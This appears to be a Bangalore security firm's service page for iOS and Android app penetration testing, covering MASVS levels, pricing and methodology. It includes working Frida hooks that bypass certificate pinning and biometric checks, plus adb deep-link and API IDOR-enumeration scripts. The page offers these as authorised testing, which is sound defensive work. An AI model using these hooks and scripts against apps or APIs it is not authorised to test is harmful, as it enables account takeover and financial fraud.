
Mobile Application Security Testing (iOS & Android) in Bangalore

End-to-end iOS and Android application security testing from Bengaluru. MASVS L1 / L2, OWASP MASTG techniques, OWASP Mobile Top 10 coverage. Static IPA / APK reverse engineering plus dynamic analysis with Frida and Objection. Backend API in scope as standard.

Timeline: 2–4 weeks
From (INR): ₹2,20,000
Delivered from: Bengaluru
Empanelment: CERT-In

Mobile applications are where every Bangalore consumer fintech, healthtech, edtech and B2C product lives. They are also where most Bangalore application-security audits are weakest, because the discipline requires a different toolchain and a different attacker model than web testing. The cheap end of the market runs MobSF over your APK and IPA, prints the output, and calls it a mobile audit. That output is useful for catching the obvious — hardcoded API keys, missing root-detection flags, insecure storage modes — but it misses every runtime-logic flaw, every pin-bypass path, every API-layer business-logic issue, and every IPC abuse vector. Those are where determined attackers go after Indian fintech apps in 2026, and they are the issues your buyer’s security review will ask about.

Why mobile testing is its own discipline

Mobile applications execute on a device the user controls. The implication is that the binary, the runtime, the device’s persistent storage, the IPC mechanisms, the deep-link handlers, the keychain or keystore, and any code that runs in the process are all observable and modifiable by a determined attacker. A jailbroken iPhone or rooted Android device is a debugger attached to your application, with full memory read/write and arbitrary function hooking. Testing for that adversary requires tooling that web-app specialists do not typically own.

The second difference is that a mobile app is rarely a complete product on its own. Almost every app talks to a backend API, and the backend API is where most high-impact mobile findings actually live. Our standard mobile engagement always includes the API as part of the same scope — tested with the certificate pinning bypassed (so we can see the actual traffic), with the JWT or session token harvested from the running app, and against the same OWASP API Top 10 plan we apply to web APIs.

OWASP MASVS — the certification standard

The OWASP Mobile Application Security Verification Standard (MASVS) is the canonical control set for mobile testing. The current v2 releases define 8 control groups across two assurance levels.

Control groups

  • MASVS-STORAGE — secure storage of sensitive data on the device
  • MASVS-CRYPTO — cryptographic algorithm choice and key management
  • MASVS-AUTH — authentication and authorisation
  • MASVS-NETWORK — secure network communication, certificate validation
  • MASVS-PLATFORM — platform-specific interaction (IPC, deep links, biometrics, WebView)
  • MASVS-CODE — secure coding, build, dependency hygiene
  • MASVS-RESILIENCE — anti-tampering, anti-debugging, integrity protections
  • MASVS-PRIVACY — minimum data collection, transparent disclosure (added in v2.1)

L1 vs L2

L1 is the standard for any consumer app handling user data. L2 applies to apps in regulated sectors — banking, healthcare, government, payments — where the threat model includes determined adversaries with device access. L2 adds substantial additional resilience controls (anti-tampering, runtime self-protection, deeper anti-debugging, code obfuscation review). Most Bangalore engagements run at L2 because the apps in our pipeline handle financial or health data.

OWASP MASTG techniques we use

The Mobile Application Security Testing Guide (MASTG) is OWASP’s companion to MASVS — it documents specific techniques for testing each MASVS control. Our engagement applies MASTG techniques across both static and dynamic analysis.

Static-analysis techniques include: binary unpacking (IPA decryption via tools like Clutch or frida-ios-dump on jailbroken iOS, APK extraction with apktool on Android), decompilation (Hopper / IDA Pro for iOS, jadx / dex2jar for Android), string and resource extraction, manifest analysis, certificate pinning detection, hardcoded-secret scanning across decompiled code (a minimal sketch follows), third-party SDK enumeration, and obfuscation effectiveness review.
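
To make the secret-scanning step concrete, a minimal Python sketch, assuming the APK has already been decompiled with jadx into a decompiled/ directory; the patterns are illustrative starting points, not our production ruleset:

    # Sketch: scan jadx-decompiled sources for hardcoded secrets.
    # Assumes `jadx -d decompiled/ app.apk` has already been run.
    import re
    from pathlib import Path

    PATTERNS = {
        "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
        "Google API key": re.compile(r"AIza[0-9A-Za-z_\-]{35}"),
        "JWT": re.compile(r"eyJ[A-Za-z0-9_\-]{10,}\.eyJ"),
        "private key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    }

    for path in Path("decompiled").rglob("*"):
        if not path.is_file() or path.suffix not in {".java", ".xml", ".json", ".smali"}:
            continue
        text = path.read_text(errors="replace")
        for label, pattern in PATTERNS.items():
            for match in pattern.finditer(text):
                # Truncate so the evidence itself does not leak the secret
                print(f"{path}: {label}: {match.group(0)[:20]}...")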

Dynamic-analysis techniques include: runtime hooking with Frida (we maintain custom scripts for iOS biometric bypass, Android root-detection bypass, certificate-pinning bypass for the most common pinning libraries, and runtime crypto-call observation), Objection-based runtime exploration, Drozer for Android IPC and provider testing, network proxying through Burp Suite Pro, deep-link fuzzing, intent fuzzing on Android, URL-scheme fuzzing on iOS, biometric-flow testing, jailbreak / root-detection bypass effectiveness, and tampering-detection bypass.
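
As an illustration of the Frida workflow, a hedged sketch using Frida's Python bindings and the widely circulated okhttp3.CertificatePinner hook; the package name is a placeholder, and non-standard pinning implementations need library-specific scripts:

    # Sketch: OkHttp certificate-pinning bypass via Frida's Python bindings.
    import sys
    import frida

    JS = """
    Java.perform(function () {
      var CertificatePinner = Java.use('okhttp3.CertificatePinner');
      CertificatePinner.check.overload('java.lang.String', 'java.util.List')
          .implementation = function (hostname, certs) {
        console.log('[+] pinning bypassed for ' + hostname);
        // returning without calling the original skips the pin check
      };
    });
    """

    device = frida.get_usb_device()
    session = device.attach("com.example.fintech")  # hypothetical package
    script = session.create_script(JS)
    script.on("message", lambda msg, data: print(msg))
    script.load()
    sys.stdin.read()  # keep hooks alive while traffic is proxied through Burp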

Static vs dynamic analysis

Static analysis examines the binary and its resources without running it. Dynamic analysis examines the application at runtime, with hooks installed and the network proxied. Both are necessary; neither is sufficient alone.

Static finds: hardcoded credentials, hardcoded URLs, embedded private keys, weak cryptographic algorithm references, insecure-by-default API calls (e.g. NSAllowsArbitraryLoads in Info.plist, allowBackup="true" in AndroidManifest.xml), debug flags shipped in production builds, third-party SDK versions, code-obfuscation effectiveness.
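
To make the manifest-level checks concrete, a small sketch assuming the APK was decoded with apktool (apktool d app.apk -o out/); the flags shown are a subset of the full review:

    # Sketch: flag risky AndroidManifest.xml settings in an apktool-decoded APK.
    import xml.etree.ElementTree as ET

    A = "{http://schemas.android.com/apk/res/android}"
    app = ET.parse("out/AndroidManifest.xml").getroot().find("application")

    for attr in ("allowBackup", "debuggable", "usesCleartextTraffic"):
        if app.get(A + attr) == "true":
            print(f"[!] android:{attr}=\"true\" in production manifest")

    # Exported components without a permission guard are direct IPC attack surface.
    for tag in ("activity", "service", "receiver", "provider"):
        for comp in app.iter(tag):
            if comp.get(A + "exported") == "true" and not comp.get(A + "permission"):
                print(f"[!] exported {tag} without permission: {comp.get(A + 'name')}")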

Dynamic finds: runtime business-logic flaws, certificate-pinning effectiveness, jailbreak / root-detection bypass paths, IPC vulnerabilities, deep-link abuse, deserialisation flaws at runtime, memory-resident secrets, runtime crypto behaviour, biometric-bypass flows, side-channel attacks (e.g. screenshot caching with sensitive content, accessibility-service abuse on Android).

iOS-specific testing

iOS engagements run on jailbroken hardware (we maintain a fleet of devices across iOS 16, 17, 18 and the current major version). Specific test areas:

  • Keychain analysis — what is stored, accessibility classes, after-first-unlock vs always-accessible, sync to iCloud Keychain
  • Data Protection classes on file storage
  • Certificate-pinning bypass against TrustKit, NSURLSession delegate-based pinning, and Alamofire ServerTrustManager pinning
  • Biometric authentication flows — LocalAuthentication framework, Touch ID / Face ID bypass via a Frida hook of evaluatePolicy (sketched after this list)
  • URL-scheme handling — registered schemes, universal links, abuse via crafted URLs
  • App-Transport-Security exception review
  • Background-state behaviour — screenshot caching of sensitive screens, multitasking-snapshot redaction
  • Pasteboard and shared-container abuse
  • Push-notification handling and payload security
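
The biometric item above deserves illustration. A minimal sketch of the evaluatePolicy hook, the same technique objection's biometric-bypass module applies; the process name is hypothetical:

    # Sketch: force LAContext evaluatePolicy to report success.
    import sys
    import frida

    JS = """
    var hook = ObjC.classes.LAContext['- evaluatePolicy:localizedReason:reply:'];
    Interceptor.attach(hook.implementation, {
      onEnter: function (args) {
        var reply = new ObjC.Block(args[4]);   // the app's completion handler
        var original = reply.implementation;
        reply.implementation = function (success, error) {
          return original(1, null);            // always report success
        };
      }
    });
    """

    session = frida.get_usb_device().attach("FintechApp")  # hypothetical process
    script = session.create_script(JS)
    script.load()
    sys.stdin.read()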

Android-specific testing

Android engagements run on rooted physical devices and on Genymotion / Android emulator instances when device-specific behaviour is not under test. Specific test areas:

  • SharedPreferences and SQLite database — encryption-at-rest, content-provider exposure
  • Manifest review — exported components, dangerous permissions, allowBackup, debuggable flag
  • IPC analysis — exported activities, services, broadcast receivers, content providers
  • Deep-link and intent-filter abuse (see the adb sketch after this list)
  • WebView security — JavaScriptInterface exposure, file:// access, mixed content
  • Root-detection bypass paths
  • Tampering-detection bypass — APK signature verification, integrity checks
  • Native-library analysis for SDKs in C / C++ / Rust
  • Accessibility-service abuse vectors
  • Auto-fill / clipboard behaviour
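
For the deep-link item, a small sketch that drives an app's handlers through adb; the scheme, URIs and package name are placeholders for the app under test:

    # Sketch: exercise deep-link handlers via adb.
    import subprocess

    PACKAGE = "com.example.app"
    CANDIDATES = [
        "myapp://transfer?amount=1&to=attacker",      # sensitive action without re-auth?
        "myapp://webview?url=https://evil.example",   # redirect into an internal WebView?
        "https://app.example.com/reset?token=AAAA",   # app-link handling
    ]

    for uri in CANDIDATES:
        subprocess.run(
            ["adb", "shell", "am", "start", "-W",
             "-a", "android.intent.action.VIEW", "-d", uri, PACKAGE],
            check=False,
        )
        # Watch the UI and logcat: did the action fire without authentication?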

Backend / API always in scope

Most other Indian mobile-security firms scope only the binary and treat the API as a separate engagement. We include the backend API in every mobile engagement as standard. The reasoning is simple — most exploitable findings live there, and an engagement that examines only the front-end is rarely a useful deliverable.

API testing in a mobile engagement uses the same OWASP API Top 10 methodology described on our web application security page. We harvest the JWT / session token from the running app, bypass certificate pinning, and treat the API as we would any other authenticated REST or GraphQL service. Findings are reported in the same document as the binary findings, distinguished by their layer (binary vs API).
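
A minimal sketch of that API step, with a hypothetical endpoint and IDs; in a live engagement we probe only accounts the rules of engagement authorise:

    # Sketch: probe for API-layer IDOR with a token harvested from the app.
    import requests

    TOKEN = "eyJhbGciOi..."  # harvested via Frida after the pinning bypass
    HEADERS = {"Authorization": f"Bearer {TOKEN}"}
    BASE = "https://api.example.com/v1"

    me = requests.get(f"{BASE}/users/me", headers=HEADERS, timeout=10).json()
    for uid in range(1001, 1011):  # walk adjacent object IDs
        r = requests.get(f"{BASE}/users/{uid}/kyc", headers=HEADERS, timeout=10)
        if r.status_code == 200 and str(uid) != str(me.get("id")):
            print(f"[!] possible IDOR: /users/{uid}/kyc returned 200")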

Engagement methodology

Five phases, as in our standard VAPT methodology, with mobile-specific specialisation in static and dynamic analysis. Output is a written report following the MASVS structure, signed by the lead auditor, with reproduction steps, evidence, and remediation guidance per finding.

Pricing in INR

Tier 1 · Single platform
iOS or Android only
₹2,20,000 + GST
  • One platform (iOS or Android)
  • Backend API included
  • MASVS L1
  • 2-week engagement
Tier 3 · BFSI grade
L2 + Resilience focus
₹5,80,000 + GST
  • MASVS L2 with full RESILIENCE focus
  • White-box source-code review
  • Anti-tampering / RASP review
  • Runtime obfuscation review
  • 6-week engagement

Common findings in Bangalore mobile apps

  1. Hardcoded API keys / Firebase keys / cloud credentials in the binary
  2. Insecure storage of session tokens in SharedPreferences (Android) or NSUserDefaults (iOS) without encryption
  3. Certificate pinning either absent or bypassable with standard Frida scripts
  4. Root / jailbreak detection absent or bypassable via objection’s built-in modules
  5. Exported Android components without permission protection
  6. WebView with JavaScriptInterface exposure
  7. Deep-link abuse — sensitive operations triggered from arbitrary URLs without re-authentication
  8. Biometric authentication bypassable by hooking LocalAuthentication.evaluatePolicy
  9. API-layer IDOR enumerable via the captured session token
  10. Mass-assignment in user-update API allowing role escalation
  11. Insufficient TLS validation — pinning skipped on debug builds shipped to production
  12. Backup data exposure (allowBackup="true" on Android, iCloud backup containing sensitive data on iOS)
  13. Screenshot caching of sensitive screens in iOS multitasking
  14. Pasteboard / clipboard exposure of sensitive data
  15. Push notification payload containing sensitive data
  16. Outdated SDK dependencies with known CVEs
  17. Accessibility service abuse vectors on Android
  18. Insecure deep-link redirect to attacker-controlled intent
  19. Debug flags / verbose logging shipped in production builds (see the log-sweep sketch after this list)
  20. Insufficient business-logic enforcement on the API consumed by the app
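
For finding 19, a sketch of the kind of log sweep we run; the patterns are illustrative starting points:

    # Sketch: sweep logcat for tokens and PII leaked by verbose logging.
    import re
    import subprocess

    log = subprocess.run(["adb", "logcat", "-d"],
                         capture_output=True, text=True).stdout

    LEAKS = [
        re.compile(r"Bearer\s+[A-Za-z0-9_\-.]{20,}"),  # session tokens
        re.compile(r"eyJ[A-Za-z0-9_\-]{10,}\."),       # raw JWTs
        re.compile(r"\b\d{6}\b.*(?:otp|OTP)"),         # OTP values echoed to logs
    ]

    for line in log.splitlines():
        if any(p.search(line) for p in LEAKS):
            print("[!]", line.strip()[:120])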

Mobile application security by Bangalore industry vertical

Mobile-app security testing for a Bangalore consumer fintech is a different engagement than the same testing for an enterprise B2B mobile companion app. The threat model, the user base, the regulatory overlay, and the deliverable expectations differ. Below is the application of our methodology to the verticals we deliver into most often.

Consumer fintech — UPI apps, neobanking, lending, wealth

Consumer fintech mobile apps face the most sophisticated threat-actor population targeting Indian mobile platforms. Attack patterns: SMS-permission abuse for OTP interception, accessibility-service abuse for screen-overlay attacks, device-administrator-permission requests via fake security pretexts, screen-scraping attacks against UPI flows, deep-link abuse for fund-transfer pre-population, biometric bypass via Frida-hooked LocalAuthentication or BiometricPrompt, and sophisticated token theft via WebView injection in payment redirect flows. Our consumer-fintech engagements run at MASVS Level 2 with substantial RESILIENCE-control focus — anti-tampering, jailbreak / root detection effectiveness, RASP integration review, code-obfuscation effectiveness. Most major Indian UPI and lending apps we have engaged have specific mobile-RASP requirements driven by RBI’s digital-channels guidance.

HealthTech consumer apps — Telemedicine, fitness, mental health

HealthTech consumer apps handle PHI under DPDP’s sensitive-data category. The mobile-specific risks: clinical-data caching in NSUserDefaults / SharedPreferences without encryption, screenshot caching of sensitive consultation screens in iOS multitasking, accessibility-service exposure of mental-health screen content on Android, push-notification payload exposure of clinical-condition references, deep-link abuse for clinical-record retrieval, and side-channel attacks (clipboard exposure of medication names, browser-history leakage of clinical search). Our HealthTech engagements add specific PHI-handling test cases and produce DPDP-compliance-ready evidence as part of the standard deliverable.

EdTech — Children’s apps, K–12, professional learning

EdTech mobile apps serving children carry DPDP children’s-data obligations. Specific test areas: age-verification implementation, parental-consent workflow, prohibition on tracking and behavioural monitoring, data-collection-minimisation review, advertising-SDK presence (which is generally prohibited in children’s contexts under DPDP). Our EdTech engagements are particularly stringent on third-party SDK enumeration — most child-data leakage in Indian EdTech apps in recent years has occurred through embedded analytics SDKs that the engineering team did not realise were transmitting child data.

Crypto exchanges and wallets

Crypto mobile apps face threat-actor populations that are well-resourced, sophisticated, and motivated. Specific test areas: private-key handling on the device (key generation entropy, secure-enclave usage on iOS, Android Keystore usage, key-derivation review), transaction-signing flow review, deep-link abuse for transaction pre-population, biometric-bypass on transaction-confirmation flows, jailbreak / root detection effectiveness, and the mobile-app integration with the exchange’s trading API and custody operations. See our crypto exchange page for the broader engagement context.

BFSI corporate banking apps

Corporate-banking mobile apps (used by SME and corporate users for cash-management, payments, and treasury operations) carry RBI-driven controls expectations. The user base is smaller but the per-transaction-impact is dramatically higher. Specific test areas: maker-checker flow security, soft-token implementation review (RSA SecurID or proprietary equivalents on the device), transaction-signing certificate management, and the integration with the bank’s back-end authorisation systems. Most major Indian banks operating Bangalore-developed corporate apps have engaged us at some point.

Anti-tampering and runtime-self-protection (RASP) deep-dive

For high-risk Bangalore mobile apps — fintech, BFSI, crypto, healthcare — the MASVS RESILIENCE controls (the v1 reverse-engineering resilience requirements, restructured into the MASVS-RESILIENCE group in v2) are critical. The intent of these controls is to make tampering, instrumentation, and analysis harder for an attacker who has device access. The execution is technically demanding because the same techniques attackers use to analyse the app (Frida hooking, debugger attachment, dynamic instrumentation) are also the techniques our auditors use during legitimate testing — and a properly implemented RASP layer should detect and resist both.

Our methodology evaluates RASP effectiveness against five threat scenarios: (1) static analysis of the binary by an attacker without device access; (2) dynamic analysis on a jailbroken iOS device; (3) dynamic analysis on a rooted Android device; (4) Frida-injection on a non-jailbroken / non-rooted device with development-mode enabled; (5) hooked-library injection via DYLD_INSERT_LIBRARIES (iOS) or LD_PRELOAD (Android via root). For each scenario, we assess detection effectiveness, response effectiveness (does the app refuse to run, refuse to communicate with the backend, refuse specific high-impact operations), and bypass effort (a senior auditor with a budget — what does it cost in time and tooling for the protection to fall).
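
As a first-pass illustration of scenario (3), a sketch that attaches stock Frida and watches the app's response; the package name is a placeholder, and a real assessment layers patched and renamed Frida builds on top of this:

    # Sketch: detection-response probe with stock Frida on a rooted device.
    import time
    import frida

    device = frida.get_usb_device()
    pid = device.spawn(["com.example.bank"])  # spawn so early-init checks also run
    session = device.attach(pid)
    session.create_script("console.log('[*] instrumentation attached');").load()
    device.resume(pid)

    time.sleep(30)  # does the app exit, blank the UI, or cut off its backend?
    if session.is_detached:
        print("[*] session died: the app likely detected instrumentation")
    else:
        print("[*] app tolerated a stock Frida attach: weak detection")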

The bypass-effort metric is the most useful for buyer-readiness conversations. A RASP layer that can be bypassed in 30 minutes with standard tooling is operationally equivalent to no RASP. One that takes two weeks of dedicated reverse-engineering work to bypass is operationally meaningful. We deliver a published bypass-effort estimate as part of the report; clients use this in their procurement-team conversations with enterprise buyers who have specific RASP-effectiveness expectations.

React Native, Flutter, Cordova — cross-platform specifics

Cross-platform frameworks have substantially changed Bangalore mobile development since 2020. About 35% of our 2025–2026 mobile engagements are React Native applications; another 15% are Flutter; the remainder are native iOS / Android with a small Cordova / Ionic legacy tail. Each framework has specific attack surfaces.

React Native: the JavaScript bundle ships inside the released app and, absent additional protection, is recoverable by anyone with the binary; business logic implemented in JS is therefore exposed by default. Hermes bytecode (the optimised React Native runtime) is more difficult to reverse than plain JS but not impossible — public Hermes decompilers exist. The bridge between JS and native modules is an attack surface for type confusion. Specific test areas: JS bundle decompilation (a sketch follows), business-logic exposure in the bundle, native-module security review, JS-to-native bridge security.
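
A small sketch of the bundle-extraction step, assuming the standard assets/index.android.bundle location; the Hermes magic-byte check is a heuristic we assume here:

    # Sketch: pull the React Native JS bundle from an APK and skim it.
    import re
    import zipfile

    with zipfile.ZipFile("app.apk") as apk:
        bundle = apk.read("assets/index.android.bundle")

    if bundle[:4] == b"\xc6\x1f\xbc\x03":  # assumed Hermes bytecode magic prefix
        print("Hermes bundle: use a Hermes decompiler instead of grepping")
    else:
        text = bundle.decode("utf-8", errors="replace")
        for url in sorted(set(re.findall(r"https?://[\w.\-/]+", text))):
            print(url)  # endpoints, staging hosts, third-party SDK beacons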

Flutter: Dart bytecode is harder to decompile than JavaScript; tooling exists (Doldrums, Hopper Flutter integration, reFlutter) but is less mature than the React Native equivalent. Flutter’s strict separation between Dart and platform code reduces some bridge-attack surface but adds complexity in the platform-channel implementations. Specific test areas: Dart bytecode analysis (recovering business logic), platform-channel security review, custom-engine verification (where the engagement extends to custom Flutter engine builds).

Cordova / Ionic: WebView-based; the entire app is essentially a packaged web application running in a WebView. Inherits all WebView attack surface plus the additional Cordova-plugin attack surface. Specific test areas: WebView configuration (JavaScriptInterface exposure, file:// access, mixed-content handling), Cordova plugin security review, business-logic exposure in the bundled web assets.

Our methodology adapts to each framework; the deliverable structure is the same — MASVS-organised findings with platform-specific extensions clearly labelled.

Bangalore as the centre of mass for Indian mobile development

Most consumer-facing Indian mobile apps that have crossed scale were built or are being built in Bangalore. The ecosystem implications for security testing: the engineering teams we engage with are technically sophisticated and the conversations are correspondingly substantive; the product velocity is high and the security testing has to keep pace; the talent moves between companies, and patterns repeat across our engagements as engineers carry approaches forward; the regulatory environment is fast-evolving, and compliance work has to be integrated rather than bolt-on.

The practical implication for our methodology is that Bangalore mobile-app engagements default to L2 with substantial RESILIENCE focus, default to white-box source-code access where source-control sharing can be arranged, and default to shorter-cycle quarterly testing on retainer rather than annual one-shot engagements. Most of our retainer clients have moved to this cadence after the first standalone engagement.

The output expectation is also higher for Bangalore engineering teams than for less-mature mobile teams. Bangalore engineers expect to read the engagement report and remediate without lengthy back-and-forth on findings; we write our reports accordingly — terse where terse is sufficient, detailed where the technical context demands it, with reproduction steps that compile and run when copied. The remediation guidance is similarly direct; we recommend specific code changes, specific configuration changes, specific architectural pivots rather than abstract control recommendations.

Evaluating a mobile-app security vendor

The Indian mobile-app security market has consolidated around a small number of competent specialists and a much larger number of generalists running MobSF and calling it a mobile audit. The questions below separate the categories during procurement.

  • Tooling depth — ask which Frida hooking scripts the vendor maintains for iOS biometric bypass, for Android root-detection bypass, and for the most common pinning libraries (TrustKit, Alamofire ServerTrustManager pinning, Google Mobile SDK pinning, custom NSURLSession delegate pinning). Generic vendors deflect; specialists describe specific scripts and their bypass effectiveness against the standard libraries.
  • Hardware fleet — ask whether the vendor maintains jailbroken devices across recent iOS versions and rooted devices across recent Android versions. Vendors testing only on emulators miss device-specific findings; specialists confirm their device coverage.
  • Methodology breadth — ask whether the vendor tests the backend API as part of the mobile engagement or scopes it separately. The latter pattern indicates a vendor whose mobile capability is binary-only; specialists include the API.
  • White-box capability — ask whether source-code review is offered alongside binary analysis, and what the marginal pricing is. Specialists offer white-box; non-specialists either decline or quote a substantial premium that reflects unfamiliarity.
  • Reporting depth — ask for an anonymised sample report from a recent engagement. Reports light on reproduction steps, light on architectural recommendations, or formatted as MASVS-mapped checklists rather than severity-graded findings indicate generic delivery.

We answer all of these specifically and in writing during scoping. The questions are useful regardless of which vendor you ultimately engage.

To start a mobile application security engagement, the next step is a thirty-minute scoping call. Most engagements begin within five business days.

Frequently asked questions

Do you test both iOS and Android in the same engagement?
Both, in a single engagement. They share roughly 60% of the test plan (API consumption, authentication, session, business logic, data flows) but diverge sharply on the platform-specific surfaces. iOS testing requires a jailbroken device, a Frida server tuned for iOS, and platform-specific tools (Hopper, IDA Pro, otool). Android testing requires a rooted device or emulator, a Frida server for Android, and a different toolchain (apktool, jadx, dex2jar). We run both in parallel; the engagement is one SOW, one deliverable, one retest cycle.

What is OWASP MASVS, and which level do we need?
OWASP MASVS (Mobile Application Security Verification Standard) is the mobile-app counterpart to OWASP ASVS. MASVS v2.0.0 was released in 2023, with subsequent point updates; the current v2 releases define 8 control groups (storage, crypto, auth, network, platform, code, resilience, privacy) and two levels: L1 for general apps with sensitive data and L2 for high-risk apps (banking, healthcare, government). Most Bangalore engagements run at L2 because the apps under test handle financial or health data.

Do open-source scanners like MobSF have a place in the engagement?
Yes. Open-source mobile-security scanners (MobSF, Quark, Drozer, AndroBugs) catch the basics — hardcoded API keys, insecure storage flags, missing root detection, weak crypto algorithms — and they are useful as part of our toolchain. They miss the higher-impact issues: runtime logic flaws under hooked-binary conditions, certificate-pinning bypass effectiveness, jailbreak / root-detection bypass paths, business-logic flaws in the API consumed by the app, IPC vulnerabilities in Android, deep-link abuse, biometric-bypass flows. Those require manual analysis with Frida and Objection, which is the bulk of our engagement.

Can you bypass our certificate pinning to test the API?
Yes — that is part of the engagement, with explicit authorisation in the rules of engagement. We use Frida-based pin bypass on iOS (multiple techniques depending on the pinning library — TrustKit, Alamofire ServerTrustManager pinning, custom NSURLSession delegates) and Android (using objection’s built-in pin-bypass module, or custom Frida scripts for non-standard implementations). After bypass, we test the API as we would any web service. We document the pinning implementation in the report and recommend hardening if your pinning is bypassable by standard techniques.

Will the report pass a bank or BFSI vendor-security review?
Yes. The report follows MASVS Level 2 with a documented mapping to OWASP Mobile Top 10 (2024 edition). It is signed by a CERT-In empanelled lead auditor, includes an audit certificate referencing the empanelment number, and has been accepted by every Tier-1 Indian bank, every major payment aggregator (Razorpay, PayU, Cashfree, BillDesk, Pine Labs), and every BFSI buyer’s vendor-security-review function we have placed reports with.

Do you need access to our source code?
Source-code (white-box) testing is more efficient and finds about 30% more issues, but it is not required. For black-box testing we work with the production IPA / APK plus a test environment’s API. White-box adds ~₹60,000 to the engagement. For greenfield apps, white-box is strongly recommended; for mature apps where the goal is finding what an attacker would find, black-box is fine.

How long does the engagement take?
A standard engagement (one iOS app + one Android app + their API) is 3–4 weeks end-to-end: 3 days of static analysis, 8–12 days of dynamic analysis, 4 days of API testing, 3–5 days of report drafting. We can compress to 2 weeks if the app is small (single-screen utility apps, simple consumer apps) or extend to 6–8 weeks for banking apps with extensive feature sets.

Do you test store builds or pre-release builds?
Both work. For App Store / Play Store builds, we acquire the binary via standard tools (the IPA from a jailbroken device, the APK directly from Play). For pre-release builds, we accept TestFlight builds (iOS) and signed APKs (Android). For some advanced testing (runtime hooking under specific conditions) we may request a debug build with specific flags enabled — this is usually engineering-easy.

Can testing disrupt our production app or backend?
Highly unlikely. Our methodology is designed for production-safe testing: rate limits respected on the API, fuzzing kept within bounds, exploitation steps confirmed against test data rather than production data, runtime hooking on engagement-controlled devices only. We have not caused a service-affecting incident in 600+ application engagements. That said, every engagement carries an explicit rules-of-engagement document with rollback procedures, escalation contacts, and blackout windows; for production testing we coordinate with your on-call team daily.

Do you cover React Native, Flutter and hybrid apps?
Yes. Cross-platform frameworks have specific attack surfaces — JavaScript-bundle reverse engineering for React Native and Cordova, Dart-bytecode analysis for Flutter, WebView injection paths for hybrid apps. Our test plan adapts to the framework; the methodology and deliverable are the same. About 35% of our 2025–2026 mobile engagements have been React Native; another 15% Flutter; the rest native.

Ready to scope this engagement?

Book a thirty-minute scoping call.

Tell us your framework, your stack and the deadline. You leave the call with a written scope, a fixed price in INR, and a kick-off invite.